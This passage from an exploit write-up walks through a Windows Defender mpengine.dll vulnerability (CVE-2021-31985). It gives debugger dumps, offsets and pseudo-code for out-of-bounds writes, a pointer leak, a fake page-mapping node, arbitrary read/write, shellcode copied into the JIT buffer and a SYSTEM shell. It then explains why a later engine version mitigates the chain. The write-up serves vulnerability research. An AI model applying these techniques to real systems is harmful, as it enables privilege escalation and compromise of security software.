We note here that while the indices 0x2F9B and 0x2F9C are valid for mpengine.dll 1.1.16000 to 1.1.16400, the corresponding indices to modify 0xC to 0x03030C (ie: OOBW2) in mpengine.dll 1.1.18100 are 0x3071 and 0x3072 instead.
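
The effect of the two indices can be reproduced with a toy model. In the sketch below, mem stands in for the byte array that switch_in() indexes, and the 32-bit size field is assumed to start at the offset that asparse2.c calls OOB_Idx2, so that the two indices hit its second and third bytes. The function name and the flat-array model are ours, not Defender's.

```c
#include <stddef.h>
#include <stdint.h>

static uint32_t rd32le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* ORs 3 into mem[indices[i]] for each index, as the loop in switch_in()
 * does, then returns the little-endian DWORD stored at size_off. */
static uint32_t apply_oobw2(uint8_t *mem, size_t size_off,
                            const uint16_t *indices, size_t n)
{
    for (size_t i = 0; i < n; i++)
        mem[indices[i]] = (uint8_t)(mem[indices[i]] | 0x3);
    return rd32le(mem + size_off);
}
```

Starting from a size of 0xC at offset 0x2F9A, indices 0x2F9B and 0x2F9C produce 0x3030C; the same holds for offset 0x3070 with indices 0x3071 and 0x3072.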

7. OOBW3

As described by [6], SampleITW_1647 contains a sequence of OOBW primitives chained together for "primitive bootstrapping". We name the last group of primitives as OOBW3 collectively, though they are in fact building up towards arbitrary R/W and code execution. Similar to section OOBW2, OOBW3 is implemented by reusing dump.exe, specifically the 2nd pass of "dump.exe" 2. Our understanding of OOBW3 benefited greatly from the concise and accurate hints by [5].

The related key functions are as follows:

  1. char PEVAMap::Reserve(PEVAMap *this, QWORD lpAddr, QWORD lpAddrEnd, DWORD flProtect, DWORD a5);
  2. char PEVAMap::Commit(PEVAMap *this, QWORD lpAddr, QWORD lpAddrEnd, DWORD flProtect);
  3. QWORD VMM_context_t<...>::insert_new_page(VMM_x32_context *vmm_x32_ctx, int dwEmuPageNum, DWORD flEmuProtect);

Each process has a vmm_x32_ctx object that tracks memory related states and objects. The relevant fields are:


// 1: kd> dq 000002471a9ed4b8+e*8 l1
// 00000247`1a9ed528  00000247`1a9f61f0
vmm_x32_ctx->EmuVaddrNode_list;		// QWORD 0xE, list of EmuVaddrNode objects
    
// 1: kd> dq 000002471a9ed4b8+10*8 l1
// 00000247`1a9ed538  00000247`1a9f40a0
// 1: kd> dw 00000247`1a9f40a0
// 00000247`1a9f40a0  0000 0001 0032 0052 0053 005a 0068 008b
// 00000247`1a9f40b0  0090 0091 00a3 00a4 00a3 00a4 00a3 00a4
// 00000247`1a9f40c0  00a3 00a4 00a3 00a4 00a3 00a4 00a3 00a4
vmm_x32_ctx->EmuNodeIndex_list;// QWORD 0x10, list of indices to nodes above

vmm_x32_ctx->EmuNodeIndex_size;// DWORD 0x644, now 0x3030C, size of index list

A 0x18 bytes object, EmuVaddrNode, describes the page mapping from a PE space address to the native Emulator address. For example, at the start of "dump.exe" 2, a work buffer at 0x70000000 is allocated with buf_ptr = pfVirtualAlloc(0x70000000, 0x20000, 0x3000, PAGE_READWRITE); here the page number is 0x70000 and it has index 0x32 in the node list. The resulting object can be found in the node array as below:


// after alloc 0x20000 at [0x70000000,0x70020000), index 0x32 (end 0x52):
// 1: kd> dc 00000247`1a9f61f0+18*32 l6
// 00000247`1a9f66a0  1aa41180 00000247 00070000 0000803f
// 00000247`1a9f66b0  0444801b 0000ffff
struct EmuVaddrNode {
    PVOID Vaddr = 0x2471aa41180;
    DWORD EmuPageNum = 0x70000;
    DWORD EmuProtect = 0x803F;
    // ... other 0x8 bytes
}
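
As a sanity check of this layout, the six DWORDs printed by the debugger can be decoded in plain C. The struct below mirrors the fields named above; the trailing 8 bytes are kept opaque, and the helper names are hypothetical.

```c
#include <stdint.h>
#include <string.h>

struct EmuVaddrNode {
    uint64_t Vaddr;        /* native (x64) address backing the page */
    uint32_t EmuPageNum;   /* PE space page number                  */
    uint32_t EmuProtect;   /* emulated protection flags             */
    uint8_t  other[8];     /* remaining bytes, meaning not covered  */
};

/* Builds a node from the six DWORDs of a "dc <addr> l6" dump. */
static struct EmuVaddrNode decode_node(const uint32_t dw[6])
{
    struct EmuVaddrNode n;
    n.Vaddr      = ((uint64_t)dw[1] << 32) | dw[0];
    n.EmuPageNum = dw[2];
    n.EmuProtect = dw[3];
    memcpy(n.other, &dw[4], sizeof n.other);
    return n;
}

/* PE space address of the first byte of the page the node describes. */
static uint32_t node_pe_address(const struct EmuVaddrNode *n)
{
    return n->EmuPageNum << 12;
}
```

Feeding it the values 1aa41180 00000247 00070000 0000803f 0444801b 0000ffff yields Vaddr 0x2471aa41180 for PE space address 0x70000000.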

The index array EmuNodeIndex_list[] provides a quick way to manipulate the EmuVaddrNode object entries. A new memory allocation is serviced by insert_new_page(), which uses a quick search algorithm to locate a suitable pivot point in EmuNodeIndex_list[], inserts the page index (possibly shifting or changing neighboring indices), inserts or modifies nodes in the EmuVaddrNode_list[] array, and finally updates the current number of index array entries, vmm_x32_ctx->EmuNodeIndex_size.

At the start of the 2nd pass of "dump.exe" 2, the size of the index list is overwritten to 0x3030C. This gives an attacker the capability to "operate" on a virtually extended, very large index array. In fact, at this point, index pair [0x0, 0x1) is for page 0x40000 and index pair [0x32, 0x52) is for page 0x70000, so the two native Vaddr values differ by (0x32 - 0x0) << 12 = 0x32000 bytes. The following constant offsets can be observed:


vmm_x32_ctx->EmuVaddrNode_list - vmm_x32_ctx->EmuNodeIndex_list = 0x2150;
EmuVaddrNode_idx0.Vaddr - vmm_x32_ctx->EmuNodeIndex_list = 0x1B0E0;
EmuVaddrNode_idx0.Vaddr - vmm_x32_ctx->EmuVaddrNode_list = 0x18F90;

Hence the address of page 0x70000, EmuVaddrNode_idx32.Vaddr, is 0x1B0E0 + 0x32000 = 0x4D0E0 bytes away from EmuNodeIndex_list[], and is reachable through a corrupted (WORD-size) index array of 0x3030C entries. In the 2nd pass of "dump.exe" 2, the 0x20000 bytes at 0x70000000 are used as a work buffer to construct fake indices and a fake EmuVaddrNode object to achieve OOBW3.
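
These offsets can be re-derived from the addresses in the debugger output shown earlier. The sketch below hard-codes those three addresses from our debugging session (they differ on every run) and uses hypothetical helper names; it relies only on the relation Vaddr(idx) = Vaddr(idx 0) + (idx << 12) stated above.

```c
#include <stdint.h>

#define PAGE_SHIFT 12

/* Addresses taken from the debugger output of one session. */
static const uint64_t kNodeList   = 0x2471a9f61f0ULL; /* EmuVaddrNode_list  */
static const uint64_t kIndexList  = 0x2471a9f40a0ULL; /* EmuNodeIndex_list  */
static const uint64_t kVaddrIdx32 = 0x2471aa41180ULL; /* node 0x32's Vaddr  */

/* Native address backing the page at node index idx. */
static uint64_t vaddr_of_index(uint64_t vaddr_idx0, uint32_t idx)
{
    return vaddr_idx0 + ((uint64_t)idx << PAGE_SHIFT);
}

/* Inverse: recover the index-0 base from any (Vaddr, index) pair. */
static uint64_t vaddr_idx0_from(uint64_t vaddr, uint32_t idx)
{
    return vaddr - ((uint64_t)idx << PAGE_SHIFT);
}

/* Nonzero if the WORD at byte offset off from the start of the index
 * list lies inside an index array of the given number of entries. */
static int reachable(uint64_t off, uint32_t entries)
{
    return off + 2 <= (uint64_t)entries * 2;
}
```

With the original size of 0xC the index array spans only 0x18 bytes, so offset 0x4D0E0 is far out of range; with 0x3030C entries it spans 0x60618 bytes and covers the start of the work buffer.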

The collective OOBW3 consists of 5 smaller steps, OP1 to OP5, followed by the final step of constructing a fake EmuVaddrNode object to achieve arbitrary R/W and code execution. Each OP_* step is a delicate sequence of crafting fake indices in the work buffer, invoking insert_new_page() one or more times to manipulate the crafted index array, and achieving some previously unavailable capability. At the core of the OP_* construction is the function get_pivot_B1009CE0(int numEntries_0x303xx, int bUpdatePivot), which computes the current pivot position in the work buffer according to the numEntries value, from 0x3030C at OP1 to 0x30316 at OP5. As insert_new_page() uses a quick search algorithm to operate on the index array, get_pivot() is concisely implemented as a mathematical characterization of the algorithm under various conditions.

Steps OP1 to OP2 leak the EmuVaddrNode object for page 0xFFD00 into the work buffer at 0x70001000. This is further used to derive the Vaddr of index 0x0, leaked_idx0_base, establishing the mapping between PE space address and native space address for later steps. The simplified pseudo-code is as follows:


// =============================================
// 1: kd> dw 000002471aa41180+13536-10 l10
// 00000247`1aa546a6  0001 0001 0001 0001 0001 0001 0091 00a3
// 00000247`1aa546b6  00a4 0001 0001 0001 0001 0001 0001 0001
// [+] PEVAMap::Reserve(lpAddr fb010000, lpEnd fb020000, flProt 4)
buf_ptr = pfVirtualAlloc(0xFB010000, 0x10000, 0x2000, PAGE_READWRITE);
// OP1.1: COMMIT 0xFB010: [a0,a1) inserted at pivot[-1,0]
buf_ptr = pfVirtualAlloc(0xFB010000, 0x1000, 0x1000, PAGE_READWRITE);
// 1: kd> dw 000002471aa41180+13536-10 l10
// 00000247`1aa546a6  0001 0001 0001 0001 0001 0001 0091 00a0
// 00000247`1aa546b6  00a1 00a3 00a4 0001 0001 0001 0001 0001
// [+] PEVAMap::Reserve(lpAddr ffd00000, lpEnd ffd10000, flProt 4)
buf_ptr = pfVirtualAlloc(0xFFD00000, 0x10000, 0x3000, PAGE_READWRITE);
// OP1.2 COMMIT 0xFFD00: merge [0xa2,0xa3) with [0xa3, 0xa4):
// 1: kd> dw 000002471aa41180+13536-10 l10
// 00000247`1aa546a6  0001 0001 0001 0001 0001 0001 0091 00a0
// 00000247`1aa546b6  00a1 00a2 00a4 0001 0001 0001 0001 0001
// 1: kd> dc 00000247`1a9f61f0+18*a2 l6
// 00000247`1a9f7120  1aab1180 00000247 000ffd00 0000003f
// 00000247`1a9f7130  02ff0000 0000ffff

buf_ptr = get_pivot(0x3030E, 1);            // 0x7001352E
// =============================================
// pre-OP2: craft a1, a2, c8ae at pivot[-1,0,1]; size 0x3030e
// COMMIT FB016 between A1 (FB011) and A2 (FFD00): trigger shift_pages()
// 1: kd> dw 000002471aa41180+1352e-10 l10
// 00000247`1aa5469e  0001 0001 0001 0001 0001 0001 0001 00a1
// 00000247`1aa546ae  00a2 c8ae 0001 0001 0001 0001 0001 0001

// page 0xFFD00 was at index 0xA2, vaddr = base_70000 + 70000:
// 1: kd> dc 00000247`1a9f61f0+18*a2 l6
// 00000247`1a9f7120  1aab1180 00000247 000ffd00 0000803f
// 00000247`1a9f7130  02ff801a 0000ffff

// Version offset to leak an EmuVaddrNode idx 0x32A6:
// The base_70000 (+0x1000) is 0x4af90 (+0x1000) from EmuVaddrNode_list
// Hence we can leak the node with controlled base
buf_ptr = pfVirtualAlloc(0xFB016000, 0x1000, 0x1000, PAGE_READWRITE);
// 1: kd> dw 000002471aa41180+1352e-10 l10
// 00000247`1aa5469e  0001 0001 0001 0001 0001 0001 0001 00a1
// 00000247`1aa546ae  00a2 00a4 00a5 32a6 32a6 c8ae 0001 0001
// 1: kd> dd 000002471a9ed4b8+4*644 l1
// 00000247`1a9eedc8  00030312

// At this point, (insert_new_page+0x4fd)=>(shift_pages+0x118):
// EmuVaddrNode for FFD00 is written OOB at base_70000 + 0x1000:
// 1: kd> dc 000002471aa41180+1000 l6
// 00000247`1aa42180  1aab1180 00000247 000ffd00 0000803f
// 00000247`1aa42190  02ff801a 0000ffff

// where Vaddr = base_70000 + 0x70000, EmuPageNum = 0xFFD00
// EmuVaddrNode idx 0x32A6, *0x18 is 0x4BF90 = 0x33000 + 0x18F90
// Now we can leak Vaddr of node 0xFFD00 (idx 0x32A6) at qw_70001000

// 0x70000 (0x70 pages) more than base Vaddr of 70000 (idx 0x32)
LODWORD(leaked_idx0_base) = *(_DWORD *)(correction_0x0000 + 0x70001000);
HIDWORD(leaked_idx0_base) = dw_0x70001004;

// base Vaddr of pages are fixed distance apart
// base_40000 (idx 0) -> base_70000 (idx 0x32) -> base_FFD00 (idx 0xA2)
leaked_idx0_base -= curr_PgIdx << 12;  // -= 0xA2000, idx 0 base, 0x40000
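
The numbers in the comments above can be replayed as plain arithmetic. This is a sketch using only values visible in the debugger output; the helper names are ours, not mpengine.dll symbols.

```c
#include <assert.h>
#include <stdint.h>

#define EMU_VADDR_NODE_SIZE     0x18u    /* stride of EmuVaddrNode_list[]            */
#define NODE_LIST_TO_IDX0_VADDR 0x18F90u /* idx0 Vaddr - EmuVaddrNode_list           */
#define WORK_BUF_PAGE_IDX       0x32u    /* page 0x70000 relative to page 0x40000    */

/* Offset inside the work buffer at which out-of-bounds node `idx` lands. */
uint32_t work_buf_offset_of_node(uint32_t idx)
{
    uint32_t node_off = idx * EMU_VADDR_NODE_SIZE;
    uint32_t work_buf_off = NODE_LIST_TO_IDX0_VADDR + (WORK_BUF_PAGE_IDX << 12);
    return node_off - work_buf_off;
}

/* Recover the native base of page index 0 from a leaked page Vaddr. */
uint64_t idx0_base_from_leak(uint64_t leaked_vaddr, uint32_t page_idx)
{
    return leaked_vaddr - ((uint64_t)page_idx << 12);
}
```

Node index 0x32A6 lands at offset 0x1000 of the work buffer, that is PE address 0x70001000, and the leaked Vaddr 0x000002471aab1180 at page index 0xA2 gives an index 0 base of 0x000002471aa0f180, the address that appears in the later `dq` dump.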

After steps OP3 to OP5 (analysis omitted), a fakeEmuVaddrNode object for page 0x3FE83 is constructed in the work buffer. Since the Vaddr value can be freely set inside the work buffer, arbitrary R/W can therefore be achieved:


// =============================================
// fakeEmuVaddrNode: constructed in work_buf 0x70000000
// idxOffset: pageNum relative to 0x32 (work_buf 0x70000)
// pageOffset: address difference within page
// =============================================
idx_fakeEmuVaddrNode = (0x18 * (leaked_idx0_base & 0xFFF) - c_0x18F90 + 0x60000) >> 12;
pageOffset_Node = (0x18 * (leaked_idx0_base & 0xFFF) - c_0x18F90) & 0xFFF;// -0xB90
// equiv. idx 0x49, (0x49 - 0x32 + 0x70000) << 12 - 0xB90 = 0x70016470
fakeEmuVaddrNode = ((idx_fakeEmuVaddrNode - 0x32) << 12) + pageOffset_Node + 0x70000000;
// fakeEmuVaddrNode.EmuPageNum = 0x3FE83
fakeEmuVaddrNode[2] = 0x400FF - ((unsigned int)(c_0x73E0 - c_0x69F0) >> 2);
fakeEmuVaddrNode[3] = 0x803F;               // EmuProtect
*(QWORD*)fakeEmuVaddrNode = leaked_idx0_base - 0x687B8;
JIT_pageNum_LW = *(_DWORD *)0x3FE83000;     // read the low DWORD
// adjust Vaddr to JIT_buf + 0x18
// 0: kd> dq 000002471aa0f180 - 687B8
// 00000247`1a9a69c8  00000247`1ab10bd5 00000247`1ab10cb8
// 00000247`1a9a69d8  00000247`1ab10d60 00000247`12ca5705
// Extract the variable part: 0x1ab10000, add 0x18, write back to Vaddr
*fakeEmuVaddrNode = (JIT_pageNum_LW & 0xFFFFF000) + 0x18;

Now fakeEmuVaddrNode.Vaddr is adjusted to point to the returning code path in the JIT buffer, and this can be used to copy shellcode into JIT and achieve code execution.
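Two of the values above can be verified directly: the EmuPageNum stored in the fake node, and the low DWORD written back into its Vaddr. The sketch below assumes that the constants c_0x73E0 and c_0x69F0 hold the values their names suggest; the function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* EmuPageNum placed in fakeEmuVaddrNode[2], assuming the named constants. */
uint32_t fake_node_page_num(void)
{
    const uint32_t c_0x73E0 = 0x73E0u;
    const uint32_t c_0x69F0 = 0x69F0u;
    return 0x400FFu - ((c_0x73E0 - c_0x69F0) >> 2);
}

/* Low DWORD of the new Vaddr: page-align the leaked pointer, then add 0x18. */
uint32_t jit_vaddr_low(uint32_t leaked_low_dword)
{
    return (leaked_low_dword & 0xFFFFF000u) + 0x18u;
}
```

With the leaked low DWORD 0x1ab10bd5 from the dump, the result is 0x1ab10018, so emulated accesses to PE address 0x3FE83000 are redirected to JIT_buf + 0x18.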

8. Popping a SYSTEM Shell

With the fakeEmuVaddrNode pointing to JIT_buf + 0x18, shellcode can now be copied to JIT by emulated execution:


// R2: copy shellcode to Vaddr = (qwo(idx0_base - 0x687B8) & ~0xFFFi64) + 0x18
qmemcpy((void *)0x3FE83000, &shellcode_B100C000, 0x294u);
// 0: kd> u 247`1ab10000 l20
// 00000247`1ab10000 56              push    rsi
// 00000247`1ab10001 57              push    rdi
// 00000247`1ab10002 53              push    rbx
// 00000247`1ab10003 55              push    rbp
// 00000247`1ab10004 4154            push    r12
// 00000247`1ab10006 4155            push    r13
// 00000247`1ab10008 4883ec28        sub     rsp,28h
// 00000247`1ab1000c 488be9          mov     rbp,rcx
// 00000247`1ab1000f 488db188380000  lea     rsi,[rcx+3888h]
// 00000247`1ab10016 ffe2            jmp     rdx
// 00000247`1ab10018 4883c428        add     rsp,28h
// 00000247`1ab1001c 415d            pop     r13
// 00000247`1ab1001e 415c            pop     r12
// 00000247`1ab10020 5d              pop     rbp
// 00000247`1ab10021 5b              pop     rbx
// 00000247`1ab10022 5f              pop     rdi
// 00000247`1ab10023 5e              pop     rsi
// 00000247`1ab10024 c3              ret

In the preparation section, we noted that a custom-built stage2.exe smaller than 0x10000 bytes can be directly substituted into dump.exe, where it gets executed as NT AUTHORITY\SYSTEM.

[Demo: cve-2021-31985-demo]



Parting Remark

While we developed the CVE-2021-31985 exploit based on mpengine.dll 1.1.16400.2, we also tested it on a later vulnerable version, mpengine.dll 1.1.18100.6, expecting to fine-tune the constant and offset values at worst. Unfortunately this is not the case.

[Figure: cve-2021-31985-1]

In the image above, the top illustration shows the EmuNodeIndex_list[] array for mpengine.dll 1.1.16400. The principal mechanism of OOBW3 relies on corrupting the length of the index_list to gain additional capabilities:

  1. Crafting malformed indices in the work buffer 0x70000000 (ie: base_70000).

  2. Using the crafted indices to create a fake EmuVaddrNode object for page 0xFFD00 at an out-of-bound node index of 0x32A6.

  3. Leaking the base Vaddr of the node at 0x70001000.

Subsequent steps OP3 to OP5 also depend on this setup.

However, in the bottom illustration for mpengine.dll 1.1.18100, the entire layout of the emulator memory mappings from base_40000 onwards is repositioned in front of the EmuVaddrNode_list[] and EmuNodeIndex_list[] arrays. In addition, the relative positions of these two lists are swapped. In this new layout, corrupting the length field of index_list no longer yields any capability to manipulate the emulator memory ranges and the node_list. This mitigates OOBW3 and therefore breaks the exploitation chain in mpengine.dll 1.1.18100, even though OOBW1 and OOBW2 still work.



References

  1. Tavis Ormandy (@taviso), Issue 2189: mpengine: asprotect embedded runtime dll memory corruption

  2. Alexei Bulazel (@0xAlexei), Windows Offender: Reverse Engineering Windows Defender's Antivirus Emulator

  3. Tavis Ormandy (@taviso), Porting Windows Dynamic Link Libraries to Linux

  4. Windows Defender CVE-2021-1647 ITW Sample

  5. ThreatBook (anquanke), Analysis of CVE-2021-1647 Vulnerability Exploitation Techniques

  6. Maddie Stone (@maddiestone), CVE-2021-1647: Windows Defender mpengine remote code execution

  7. Windows Defender CVE-2021-1647 Public Sample